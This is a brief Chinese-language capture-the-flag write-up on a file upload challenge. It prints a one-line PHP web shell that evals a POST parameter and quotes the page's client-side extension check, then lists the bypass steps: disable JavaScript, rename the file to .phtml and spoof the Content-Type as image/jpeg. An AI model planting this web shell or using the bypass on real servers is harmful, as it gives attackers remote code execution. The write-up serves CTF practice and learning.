Upload
一句话木马
<?php @eval($_POST['shell']);?>
js 源代码
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name) == -1) {
var errMsg = "该文件不允许上传,请上传jpg、png、gif结尾的图片噢!";
alert(errMsg);
return false;
}
}
将 js 关了,重新上传一句话,也不行
修改文件后缀名为 .phtml 文件类型为 Content-Type: image/jpeg
访问 木马页,查看根目录
得到 flag
shell管理工具连接